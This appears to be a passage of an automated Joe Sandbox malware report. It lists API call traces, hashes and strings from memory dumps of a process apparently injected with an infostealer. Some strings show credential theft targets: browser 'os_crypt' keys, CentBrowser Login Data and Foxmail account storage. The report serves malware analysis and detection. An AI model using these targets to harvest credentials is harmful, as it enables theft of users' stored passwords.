                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Error_Util$DestroyModule
                                                                                      • String ID:
                                                                                      • API String ID: 1706340848-0
                                                                                      • Opcode ID: a1ce8f402043530765263302be7b9e0a916d60e95afc9cb42205ffa32ad49189
                                                                                      • Instruction ID: 727826e5d74294b04977969facdeaa1b9fad8acbfd33ce745452051afec55971
                                                                                      • Opcode Fuzzy Hash: a1ce8f402043530765263302be7b9e0a916d60e95afc9cb42205ffa32ad49189
                                                                                      • Instruction Fuzzy Hash: 8341D772F05205DBDF18CF6EC480F5A73B8AFA4329F25816EE8149BA64E774C481CB60
                                                                                      APIs
                                                                                      • sqlite3_free.NSS3(00000000,00000000,?,?,?,?,6CC63CF5,00000000,?,00000001,?,6CCA9D3C,00000000,?,00000000), ref: 6CCA6676
                                                                                        • Part of subcall function 6CCA1B25: sqlite3_mutex_enter.NSS3(?,?,6CC63C8B,6CCB8B25,?,?,6CCB8B25,0000000A,6CC8C693,?,6CCAC4DC,?,6CD539E4,00000001), ref: 6CCA1B53
                                                                                        • Part of subcall function 6CCA1B25: sqlite3_mutex_leave.NSS3(6CCB8B25,0000000A,?,?,6CC63C8B,6CCB8B25,?,?,6CCB8B25,0000000A,6CC8C693,?,6CCAC4DC,?,6CD539E4,00000001), ref: 6CCA1B6A
                                                                                      • sqlite3_mutex_enter.NSS3(?,6CC63CF5,00000000,?,00000001,?,6CCA9D3C,00000000,?,00000000,?,00000000,?,?,6CC74621,?), ref: 6CCA66CB
                                                                                      • sqlite3_mutex_leave.NSS3 ref: 6CCA676D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                                                      • String ID:
                                                                                      • API String ID: 251237202-0
                                                                                      • Opcode ID: c35049350cef51527014b217c21ca7ef5d4e0790a634e9aabcf46dc2f395c3ea
                                                                                      • Instruction ID: 12aad707ee7dc62430d5ff86c5bda322ec71d6fae2edb1b05495f9444a1970fa
                                                                                      • Opcode Fuzzy Hash: c35049350cef51527014b217c21ca7ef5d4e0790a634e9aabcf46dc2f395c3ea
                                                                                      • Instruction Fuzzy Hash: E131A735626606EFDF05AFF9DD8CC8E37B9EB46B64B24412AFA04C2A10FB31D5478650
                                                                                      APIs
                                                                                        • Part of subcall function 0040C2CC: LocalAlloc.KERNEL32(00000040,00000000,00000000,00000000,?,0040C663,00000000,00000000,00000000,00000000,?,0040BDD0,?,?,00000000,?), ref: 0040C2E9
                                                                                      • LocalFree.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,0040BDD0,?,?,00000000,?), ref: 0040C6A8
                                                                                        • Part of subcall function 0040C157: LocalFree.KERNEL32(?), ref: 0040C1CA
                                                                                        • Part of subcall function 0040C157: LocalFree.KERNEL32(?,00000000,-0000003A,00000000,?), ref: 0040C1D1
                                                                                      • LocalFree.KERNEL32(?,00000000,00000000,00000000,00000000,?,0040BDD0,?,?,00000000,?), ref: 0040C6B1
                                                                                      Strings
                                                                                      • "os_crypt":{"encrypted_key":", xrefs: 0040C669
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Local$Free$Alloc
                                                                                      • String ID: "os_crypt":{"encrypted_key":"
                                                                                      • API String ID: 3098330729-81358813
                                                                                      • Opcode ID: 7f82904e38f27199bf38bcffae6f1e6bee577d1174808b2e62837bf7281947a4
                                                                                      • Instruction ID: 70d22dfbdf0b7f35c08b76519d9f1149b4e7f93d3ff808d1da124c1c67fb738a
                                                                                      • Opcode Fuzzy Hash: 7f82904e38f27199bf38bcffae6f1e6bee577d1174808b2e62837bf7281947a4
                                                                                      • Instruction Fuzzy Hash: C201B133904115ABC725A796DC8689F76699F84764711027AF801B22D0EE3A9D5186DC
                                                                                      APIs
                                                                                        • Part of subcall function 0040319E: lstrlenA.KERNEL32(00000000,004031C6,759801C0,00000000,00000000, 6@,004033EE, 6@,00000000,-00000001,759801C0,?,00403620,00000000,?,?), ref: 004031A5
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,-00000002,00000000,00000000,759801C0,00000000,00000000, 6@,004033EE, 6@,00000000,-00000001,759801C0), ref: 004031DC
                                                                                        • Part of subcall function 00405F68: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,004034F4,?,00405B8D,.bss,00000000), ref: 00405F76
                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?,00403620,00000000,?,?,759801C0,00000000), ref: 00403207
                                                                                        • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                                        • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                                        • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL(?,00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403732
                                                                                        • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000,00000000,?,?,0041348B,00000000,00000000,00000000,.bss,00000000), ref: 0040356E
                                                                                        • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: lstrlen$ByteCharMultiVirtualWide$AllocDispatcherExceptionFreeUserlstrcpy
                                                                                      • String ID: 6@
                                                                                      • API String ID: 2128046513-952913687
                                                                                      • Opcode ID: 965d8dd81a74f5d09d014fa291a104e6ddb31e23959b071733c44e1b5f22b382
                                                                                      • Instruction ID: d9978922c9701d3022712c3417eb10aadbb871c603d42485b42bce1279e5fb8f
                                                                                      • Opcode Fuzzy Hash: 965d8dd81a74f5d09d014fa291a104e6ddb31e23959b071733c44e1b5f22b382
                                                                                      • Instruction Fuzzy Hash: EB019231600114BBCB14EFA6CC86D9E3AADDF09759B00007AF502AB3D1CA788E0087A8
                                                                                      APIs
                                                                                      • SECMOD_FindModule.NSS3(?,00000000,?,6CD13E21,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 6CD13CA9
                                                                                        • Part of subcall function 6CD1421E: PORT_SetError_Util.NSS3(FFFFE09A,00000000,?,6CD13CAE,?,00000000,?,6CD13E21,00000000,00000000), ref: 6CD14232
                                                                                      • SECMOD_DestroyModule.NSS3(00000000,00000000,?,6CD13E21,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 6CD13CB4
                                                                                        • Part of subcall function 6CD14161: PR_Lock.NSS3(?,00000000,00000000,?,6CD144A4,00000000,00000000,6CD04E08,?,00000004,?,6CD144F6,81757400,00000004,6CD04CC7,?), ref: 6CD1416C
                                                                                        • Part of subcall function 6CD14161: PR_Unlock.NSS3(?,?,6CD144A4,00000000,00000000,6CD04E08,?,00000004,?,6CD144F6,81757400,00000004,6CD04CC7,?,00000000), ref: 6CD1417E
                                                                                      • SECMOD_ReferenceModule.NSS3(00000000,?,6CD13E21,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CD13CD8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Module$DestroyError_FindLockReferenceUnlockUtil
                                                                                      • String ID:
                                                                                      • API String ID: 885814174-0
                                                                                      • Opcode ID: 42ffdc4dd53c03c3fa8faebaa838a96e07e177fed3ea606874302d3307dd9f2f
                                                                                      • Instruction ID: fd5f2ee7fd455169947ebbf6a729d85dc19b3f9af56a2cad3e6bc64203af5ae7
                                                                                      • Opcode Fuzzy Hash: 42ffdc4dd53c03c3fa8faebaa838a96e07e177fed3ea606874302d3307dd9f2f
                                                                                      • Instruction Fuzzy Hash: A8F0EC7258D712B6D9111B38FD019CB379D5F0227C720062BF90497EB0EF61E49941B9
                                                                                      APIs
                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,00000001,?,?,?,?,0040B507,001303D0), ref: 00413413
                                                                                      • WriteFile.KERNEL32(00000000,?,0040B507,001303D0,00000000,?,0040B507,001303D0), ref: 0041342A
                                                                                      • CloseHandle.KERNEL32(00000000,?,0040B507,001303D0), ref: 00413431
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: File$CloseCreateHandleWrite
                                                                                      • String ID:
                                                                                      • API String ID: 1065093856-0
                                                                                      • Opcode ID: 89e92a5504dc262254f1e5419c023f0b611b846a3e6a28bed2ddf63b845c8b0b
                                                                                      • Instruction ID: 27d02c7cf6f9fa5a5b1c4e4eab120700ffe7c718fe379db20a04a7387675d07b
                                                                                      • Opcode Fuzzy Hash: 89e92a5504dc262254f1e5419c023f0b611b846a3e6a28bed2ddf63b845c8b0b
                                                                                      • Instruction Fuzzy Hash: BEE092B2101218BFE3115B99EC88DEB7E7CDB893B9F108175FA1592190D2304E0146B8
                                                                                      APIs
                                                                                      • PR_Init.NSS3(?,6CCD411D,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCC7CC0
                                                                                      • PR_Calloc.NSS3(00000001,0000000C,?,?,6CCD411D,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCC7CCA
                                                                                      • strdup.MOZGLUE(?,?,?,6CCD411D,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCC7CDA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: CallocInitstrdup
                                                                                      • String ID:
                                                                                      • API String ID: 2643795527-0
                                                                                      • Opcode ID: b839e1bc4090a6e6cc4923bd41ada8746506203141c271d9350717b05b8e485f
                                                                                      • Instruction ID: c5165dea883be96d8ada10cfc767d4be215d337a09d3875fff01e4b286b3b188
                                                                                      • Opcode Fuzzy Hash: b839e1bc4090a6e6cc4923bd41ada8746506203141c271d9350717b05b8e485f
                                                                                      • Instruction Fuzzy Hash: 42F0E532B067198FE710AF54F805B867BF8EB02B75F60001EE64E96B80EB7064808789
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                                        • Part of subcall function 00405F68: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,004034F4,?,00405B8D,.bss,00000000), ref: 00405F76
                                                                                      • lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                                      • KiUserExceptionDispatcher.NTDLL(?,00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403732
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: lstrlen$AllocDispatcherExceptionUserVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 4104320610-0
                                                                                      • Opcode ID: 96b2e3897768bbd6e10730d6ed17acb4c112f255b8150d38640a79b50927bcda
                                                                                      • Instruction ID: d87089fda059f3a9f0aa326a45a2dd5dbcd19400e603affda063e63bb9935f18
                                                                                      • Opcode Fuzzy Hash: 96b2e3897768bbd6e10730d6ed17acb4c112f255b8150d38640a79b50927bcda
                                                                                      • Instruction Fuzzy Hash: E6E09235140209ABCF015F61EC0DD8D3F39EBC4351B00443AF90182270CF369560CB54
                                                                                      APIs
                                                                                      • sqlite3_initialize.NSS3(?,?), ref: 6CC63B73
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_initialize
                                                                                      • String ID: F
                                                                                      • API String ID: 1587646821-1304234792
                                                                                      • Opcode ID: dae8f62b910a82b77b1d873c073fcaa26d0defe82f1eae3bf3a861e99baa1713
                                                                                      • Instruction ID: 02457de4f638dce1b09c2dea16e9e04787b14d2fcd66a49ba74af226d2861b06
                                                                                      • Opcode Fuzzy Hash: dae8f62b910a82b77b1d873c073fcaa26d0defe82f1eae3bf3a861e99baa1713
                                                                                      • Instruction Fuzzy Hash: FC01FB71D0134CABCF00DFE9C9458DEB7F8AF45354F10416AD909EB600FB709A098B91
                                                                                      APIs
                                                                                        • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                                                                        • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,00000000,000007D0,?,00000000,?VA,?,00412BF1,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows,00000000,InitWindows), ref: 004109C1
                                                                                        • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                                        • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                                        • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL(?,00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403732
                                                                                        • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000,00000000,?,?,0041348B,00000000,00000000,00000000,.bss,00000000), ref: 0040356E
                                                                                        • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                                        • Part of subcall function 00401099: GetProcessHeap.KERNEL32(00000000,00000000,00413499,00000000,00000000,00000000,00000000,.bss,00000000), ref: 0040109F
                                                                                        • Part of subcall function 00401099: RtlFreeHeap.NTDLL(00000000), ref: 004010A6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Heap$FreeProcesslstrlen$AllocateDispatcherExceptionFileModuleNameUserVirtuallstrcpy
                                                                                      • String ID: ?VA
                                                                                      • API String ID: 3831115454-1028452459
                                                                                      • Opcode ID: 8cef1380534583691e696aebdce0dae74638d6ff3451c26b8d71adc870b3bb80
                                                                                      • Instruction ID: a8e575aaac2c0b60fdd0bfa417f7cf0f615c7bb468fc2b6995dd3cebff2648c5
                                                                                      • Opcode Fuzzy Hash: 8cef1380534583691e696aebdce0dae74638d6ff3451c26b8d71adc870b3bb80
                                                                                      • Instruction Fuzzy Hash: 5AE06D626042107BD214B767EC17FAF3AADCF8136AF00003EF545A62D1DEB85A0086A8
                                                                                      APIs
                                                                                        • Part of subcall function 00403373: lstrlenW.KERNEL32(759801C0,00403758,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,759801C0,00000000), ref: 0040337A
                                                                                      • lstrcatW.KERNEL32(00000000,759801C0,?,?,?VA,?,00412AEE,?VA,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,759801C0,00000000), ref: 00403477
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: lstrcatlstrlen
                                                                                      • String ID: ?VA
                                                                                      • API String ID: 1475610065-1028452459
                                                                                      • Opcode ID: 2f3517887fd5a0b623de7eb871a814aad56a43f5e694413d6d57f4bdb99eb0b7
                                                                                      • Instruction ID: 49b9b30c5e13f085cb611e028f6c6d6892849633b3b038c637a710d95911752b
                                                                                      • Opcode Fuzzy Hash: 2f3517887fd5a0b623de7eb871a814aad56a43f5e694413d6d57f4bdb99eb0b7
                                                                                      • Instruction Fuzzy Hash: 02E0D8327042105BCB106B66D8C496E7B5DEF853A0704043AF90597250DE785C0096E8
                                                                                      APIs
                                                                                        • Part of subcall function 004094FF: RegOpenKeyExA.KERNEL32(80000001,software\Aerofox\FoxmailPreview,00000000,00020019,00000000,?,?,?,?,004096E0,?,00000000,?,0040BB66,?), ref: 0040951A
                                                                                        • Part of subcall function 004094FF: RegQueryValueExA.ADVAPI32(00000000,Executable,00000000,00000000,00426868,?,?,?,?,?,004096E0,?,00000000,?,0040BB66,?), ref: 00409541
                                                                                        • Part of subcall function 004094FF: PathRemoveFileSpecA.SHLWAPI(00426868,?,?,?,?,004096E0,?,00000000,?,0040BB66,?,?,00000000,?,\CentBrowser\User Data\Default\Login Data,\CentBrowser\User Data\Local State), ref: 0040954C
                                                                                      • PathCombineA.SHLWAPI(00426760,00426868,Storage,?,00000000,?,0040BB66,?,?,00000000,?,\CentBrowser\User Data\Default\Login Data,\CentBrowser\User Data\Local State,00000000,00000000,00000012), ref: 004096F4
                                                                                        • Part of subcall function 0040955B: GetFullPathNameA.KERNEL32(00426760,00000104,?,00000000,00426760,?), ref: 0040957C
                                                                                        • Part of subcall function 0040955B: PathCombineA.SHLWAPI(?,?,00418F18), ref: 0040959B
                                                                                        • Part of subcall function 0040955B: FindFirstFileA.KERNEL32(?,?), ref: 004095AB
                                                                                        • Part of subcall function 0040955B: PathCombineA.SHLWAPI(?,00426760,0000002E), ref: 004095E2
                                                                                        • Part of subcall function 0040955B: PathCombineA.SHLWAPI(?,?,Accounts\Account.rec0), ref: 004095F1
                                                                                        • Part of subcall function 0040955B: FindNextFileA.KERNEL32(00000000,?), ref: 00409609
                                                                                        • Part of subcall function 00409244: CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000,00000000,775BA1D0,?), ref: 00409261
                                                                                        • Part of subcall function 00409244: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00409601,?), ref: 0040926E
                                                                                        • Part of subcall function 00409244: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00409601,?), ref: 00409275
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Path$CombineFile$Find$CloseCreateErrorFirstFullHandleLastNameNextOpenQueryRemoveSpecValue
                                                                                      • String ID: Storage
                                                                                      • API String ID: 4053074784-2613519016
                                                                                      • Opcode ID: eed5aa7b60bef120f6fdbb1fef1821f739ec47d59d61e1b16e715c7f6fdaeeeb
                                                                                      • Instruction ID: 0c98b8442599193312f6ffc2be4cf7b6f449dfdeac2696cda5fbe634511fcdd4
                                                                                      • Opcode Fuzzy Hash: eed5aa7b60bef120f6fdbb1fef1821f739ec47d59d61e1b16e715c7f6fdaeeeb
                                                                                      • Instruction Fuzzy Hash: DED05E7271522036C6193B7B3C5AAAF575A99C2B2531504BFB50AF32D3CEAC5D03416C
                                                                                      APIs
                                                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 00410F4F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: GlobalMemoryStatus
                                                                                      • String ID: @
                                                                                      • API String ID: 1890195054-2766056989
                                                                                      • Opcode ID: c6a9c33adf8cb2534706d2293455489c4228333e4d6906dfe0117a3942ecd40c
                                                                                      • Instruction ID: d9f2321eff05eb65c1a6ec23fe9c601d12d7e4051eb8d8bbb06cde1247bdc179
                                                                                      • Opcode Fuzzy Hash: c6a9c33adf8cb2534706d2293455489c4228333e4d6906dfe0117a3942ecd40c
                                                                                      • Instruction Fuzzy Hash: B6D0C9B490030CEBDB00DBA4D849B9CB7B8AB04304F400124EA02A3380D778E8058A55
                                                                                      APIs
                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ActivCard SA,0000000C,00000000,6CD0B338,?,00000040), ref: 6CD12A08
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: strncmp
                                                                                      • String ID: ActivCard SA
                                                                                      • API String ID: 1114863663-1432690258
                                                                                      • Opcode ID: 241b092bb3c53be5b0e1f60e08805ffd9955e36cd38a91e1e2297f711f201111
                                                                                      • Instruction ID: 91fb19f64b9925a45d2fc6eb43b9e0713c64f040de59f275124f6ceecaf1ef79
                                                                                      • Opcode Fuzzy Hash: 241b092bb3c53be5b0e1f60e08805ffd9955e36cd38a91e1e2297f711f201111
                                                                                      • Instruction Fuzzy Hash: 46415BB1904709DFDB20CF6AD884A9AB7F8FF46308F10852ED59697A11D731A605CF90
                                                                                      APIs
                                                                                        • Part of subcall function 6CD119D2: PR_Lock.NSS3(50DC458D,?,6CD0A74B,6CCF4FEA,EBFFC883,?,6CD0E826,6CCF4FEA,?,?,?,6CCF4FEA,?,?,6CD1180D,6CCF4FEA), ref: 6CD119DB
                                                                                      • PORT_SetError_Util.NSS3(00000000), ref: 6CD0A874
                                                                                      • PORT_SetError_Util.NSS3(00000000,000000B3,00000102,00000000,00000000,000000FF,?,6CD0965D,00000000,00000102,00000002), ref: 6CD0A889
                                                                                        • Part of subcall function 6CD119E4: PR_Unlock.NSS3(50DC458D,?,6CD0A761,6CCF4FEA,6CD0E826,6CCF4FEA,?,?,?,6CCF4FEA,?,?,6CD1180D,6CCF4FEA,?), ref: 6CD119ED
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Error_Util$LockUnlock
                                                                                      • String ID:
                                                                                      • API String ID: 110784789-0
                                                                                      • Opcode ID: f9ef13f99d1b82259bdd633e264257a8e5551d67f7be6a3cbd06515aeb6e8ebe
                                                                                      • Instruction ID: 49aaa7aadb89c2b4c0d3c7ce9c570eaa8a58a0d42e0e124096f69108b6057a9d
                                                                                      • Opcode Fuzzy Hash: f9ef13f99d1b82259bdd633e264257a8e5551d67f7be6a3cbd06515aeb6e8ebe
                                                                                      • Instruction Fuzzy Hash: 9311B235604204ABCB159FA8DC44ADE77A8FF85314B10002DF85987B20EB71EA5786A1
                                                                                      APIs
                                                                                        • Part of subcall function 00403373: lstrlenW.KERNEL32(759801C0,00403758,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,759801C0,00000000), ref: 0040337A
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00404FB1,?), ref: 00403693
                                                                                        • Part of subcall function 00405FFA: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00403764,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,759801C0,00000000), ref: 00406004
                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00404FB1,?,?,?,?,?,00000000), ref: 004036BE
                                                                                        • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,759801C0,?,00405B8D,.bss,00000000), ref: 004034DA
                                                                                        • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,?,00405B8D,.bss,00000000), ref: 004034E7
                                                                                        • Part of subcall function 004034D1: lstrcpyA.KERNEL32(00000000,?,?,00405B8D,.bss,00000000), ref: 004034FA
